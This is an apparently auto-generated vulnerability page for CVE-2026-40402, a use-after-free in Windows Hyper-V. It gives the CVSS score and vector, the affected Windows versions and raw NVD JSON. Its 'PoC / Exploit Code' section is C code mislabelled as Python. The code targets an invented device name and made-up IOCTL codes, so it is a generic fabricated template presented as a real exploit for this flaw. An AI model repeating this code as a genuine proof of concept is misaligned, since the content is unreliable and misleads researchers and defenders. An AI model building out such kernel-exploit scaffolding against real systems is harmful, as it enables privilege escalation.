Security Vulnerability Report
中文
CVE-2026-40402 CVSS 9.3 CRITICAL

CVE-2026-40402

Published: 2026-05-12 18:17:18
Last Modified: 2026-05-13 15:34:53
Source: [email protected]

Description

Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Windows 10 Version 1809
Windows 10 Version 21H2
Windows 10 Version 22H2
Windows 11 Version 21H2
Windows 11 Version 22H2
Windows 11 Version 23H2
Windows Server 2019
Windows Server 2022

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual PoC for CVE-2026-40402 (Hyper-V UAF) // This PoC demonstrates the trigger logic for a Use-After-Free vulnerability. // It requires a vulnerable Windows Hyper-V environment. #include <windows.h> #include <stdio.h> #define VULN_IOCTL_ALLOC 0x80002010 #define VULN_IOCTL_FREE 0x80002014 #define VULN_IOCTL_USE 0x80002018 int main() { HANDLE hDevice; DWORD bytesReturned; char inputBuffer[0x100]; char outputBuffer[0x100]; printf("[*] Starting PoC for CVE-2026-40402...\n"); // 1. Open a handle to the vulnerable Hyper-V interface (Symbolic link) hDevice = CreateFile("\\\\.\\HyperVVulnerableDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %d\n", GetLastError()); return 1; } printf("[+] Device handle opened.\n"); memset(inputBuffer, 0, sizeof(inputBuffer)); // 2. Trigger allocation of the target object in kernel memory printf("[*] Sending IOCTL to allocate object...\n"); DeviceIoControl(hDevice, VULN_IOCTL_ALLOC, inputBuffer, sizeof(inputBuffer), NULL, 0, &bytesReturned, NULL); // 3. Trigger the free of the object (The Vulnerability) printf("[*] Sending IOCTL to free object...\n"); DeviceIoControl(hDevice, VULN_IOCTL_FREE, inputBuffer, sizeof(inputBuffer), NULL, 0, &bytesReturned, NULL); // 4. Use-After-Free: Attempt to use the freed object // In a real exploit, this would be preceded by Heap Spraying to control the freed memory printf("[*] Sending IOCTL to trigger UAF...\n"); DeviceIoControl(hDevice, VULN_IOCTL_USE, inputBuffer, sizeof(inputBuffer), outputBuffer, sizeof(outputBuffer), &bytesReturned, NULL); printf("[+] PoC executed. Check for BSOD or kernel debugger output.\n"); CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40402", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:18.000", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40402", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.